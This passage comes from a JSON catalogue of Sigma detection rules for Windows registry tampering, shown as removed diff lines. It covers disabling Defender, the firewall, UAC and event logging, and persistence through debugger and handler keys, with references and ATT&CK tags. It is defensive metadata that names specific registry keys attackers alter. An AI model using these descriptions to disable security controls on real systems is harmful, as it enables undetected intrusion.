"45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "value": "IE Change Domain Zone" - }, - { - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "meta": { - "author": "B.Talebi", - "creation_date": "2022/07/28", - "falsepositive": [ - "Legitimate driver altitude change to hide sysmon" - ], - "filename": "registry_set_change_sysmon_driver_altitude.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", - "https://youtu.be/zSihR3lTf7g", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "value": "Disable Sysmon Event Logging Via Registry" - }, - { - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "meta": { - "author": "frack113", - "creation_date": "2022/09/17", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_change_winevt_channelaccess.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", - "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", - "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "value": "Change Winevt Event Access Permission Via Registry" - }, - { - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_chm_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/htmlhelpauthor.html", - "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", - "value": "CHM Helper DLL Persistence" - }, - { - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_chrome_extension.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1133" - ] - }, - "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", - "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension" - }, - { - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "meta": { - "author": "Wojciech Lesicki", - "creation_date": "2021/06/29", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_cobaltstrike_service_installs.yml", - "level": "critical", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" - ] - }, - "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "value": "CobaltStrike Service Installations in Registry" - }, - { - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "meta": { - "author": "Omkar Gudhate", - "creation_date": "2020/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_comhijack_sdclt.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", - "https://www.exploit-db.com/exploits/47696", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" - ] - }, - "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", - "value": "COM Hijack via Sdclt" - }, - { - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "meta": { - "author": "Tobias Michalski", - "creation_date": "2022/02/24", - "falsepositive": [ - "Legitimate disabling of crashdumps" - ], - "filename": "registry_set_crashdump_disabled.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" - ], - "tags": [ - "attack.t1564", - "attack.t1112" - ] - }, - "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", - "value": "CrashControl CrashDump Disabled" - }, - { - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "meta": { - "author": "Florian Roth, frack113", - "creation_date": "2022/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_creation_service_susp_folder.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", - "value": "Service Binary in Suspicious Folder" - }, - { - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_creation_service_uncommon_folder.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "277dc340-0540-42e7-8efb-5ff460045e07", - "value": "Service Binary in Uncommon Folder" - }, - { - "description": "Detects the abuse of custom file open handler, executing powershell", - "meta": { - "author": "CD_R0M_", - "creation_date": "2022/06/11", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "value": "Custom File Open Handler Executes PowerShell" - }, - { - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "meta": { - "author": "EagleEye Team, Florian Roth, NVISO", - "creation_date": "2020/05/13", - "falsepositive": [ - "New printer port install on host" - ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://windows-internals.com/printdemon-cve-2020-1048/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml" - ], - "tags": [ - "attack.persistence", - "attack.execution", - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "7ec912f2-5175-4868-b811-ec13ad0f8567", - "value": "Suspicious New Printer Ports in Registry (CVE-2020-1048)" - }, - { - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "meta": { - "author": "Sittikorn S, frack113", - "creation_date": "2021/07/16", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml", - "level": "critical", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" - ] - }, - "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "value": "CVE-2021-31979 CVE-2021-33771 Exploits" - }, - { - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "meta": { - "author": "Sittikorn S", - "creation_date": "2020/05/31", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_cve_2022_30190_msdt_follina.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", - "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1221" - ] - }, - "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", - "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)" - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence which will get invoked when an application crashes", - "meta": { - "author": "frack113", - "creation_date": "2022/08/07", - "falsepositive": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" - ], - "filename": "registry_set_dbgmanageddebugger_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", - "https://github.com/last-byte/PersistenceSniper", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574" - ] - }, - "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", - "value": "Add Debugger Entry To DbgManagedDebugger For Persistence" - }, - { - "description": "Detects the Setting of Windows Defender Exclusions", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/07/06", - "falsepositive": [ - "Administrator actions" - ], - "filename": "registry_set_defender_exclusions.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_nullbind/status/1204923340810543109", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "value": "Windows Defender Exclusions Added - Registry" - }, - { - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "meta": { - "author": "Dimitrios Slamaris", - "creation_date": "2017/05/15", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_dhcp_calloutdll.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ] - }, - "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "value": "DHCP Callout DLL Installation" - }, - { - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/04", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", - "value": "Disable Exploit Guard Network Protection on Windows Defender" - }, - { - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/04", - "falsepositive": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" - ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "value": "Disabled Windows Defender Eventlog" - }, - { - "description": "Detects disabling Windows Defender PUA protection", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/04", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", - "value": "Disable PUA Protection on Windows Defender" - }, - { - "description": "Detects disabling Windows Defender Tamper Protection", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/04", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", - "value": "Disable Tamper Protection on Windows Defender" - }, - { - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "meta": { - "author": "frack113", - "creation_date": "2022/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_administrative_share.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ] - }, - "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", - "value": "Disable Administrative Share Creation at Startup" - }, - { - "description": "Detects tampering of autologger trace sessions which is a technique used by attackers to disable logging", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_autologger_sessions.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "value": "AutoLogger Sessions Tamper" - }, - { - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", - "meta": { - "author": "frack113", - "creation_date": "2022/01/09", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_defender_firewall.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", - "value": "Disable Microsoft Defender Firewall via Registry" - }, - { - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/03/18", - "falsepositive": [ - "Legitimate admin script" - ], - "filename": "registry_set_disable_function_user.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", - "value": "Disable Internal Tools or Feature in Registry" - }, - { - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_macroruntimescanscope.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", - "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", - "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "value": "Disable Macro Runtime Scan Scope" - }, - { - "description": "Disable Microsoft Office Security Features by registry", - "meta": { - "author": "frack113", - "creation_date": "2021/06/08", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_microsoft_office_security_features.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "7c637634-c95d-4bbf-b26c-a82510874b34", - "value": "Disable Microsoft Office Security Features" - }, - { - "description": "Detects registry modifications that disable Privacy Settings Experience", - "meta": { - "author": "frack113", - "creation_date": "2022/10/02", - "falsepositive": [ - "Legitimate admin script" - ], - "filename": "registry_set_disable_privacy_settings_experience.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", - "value": "Disable Privacy Settings Experience in Registry" - }, - { - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_security_center_notifications.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", - "value": "Disable Windows Security Center Notifications" - }, - { - "description": "Detects the modification of the registry to disable a system restore on the computer", - "meta": { - "author": "frack113", - "creation_date": "2022/04/04", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_system_restore.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", - "value": "Registry Disable System Restore" - }, - { - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "meta": { - "author": "frack113", - "creation_date": "2022/01/05", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_uac_registry.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ] - }, - "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", - "value": "Disable UAC Using Registry" - }, - { - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "meta": { - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Administrator actions" - ], - "filename": "registry_set_disable_windows_defender_service.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", - "value": "Windows Defender Service Disabled" - }, - { - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_windows_firewall.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "value": "Disable Windows Firewall by Registry" - }, - { - "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/07/04", - "falsepositive": [ - "Legitimate administrators disabling specific event log for troubleshooting" - ], - "filename": "registry_set_disable_winevt_logging.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/WhichbufferArda/status/1543900539280293889", - "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", - "value": "Disable Winevt Event Logging Via Registry" - }, - { - "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disallowrun_execution.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9", - "value": "Add DisallowRun Execution to Registry" - }, - { - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", - "value": "Persistence Via Disk Cleanup Handler - Autorun" - }, - { - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/07/22", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_dns_over_https_enabled.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - 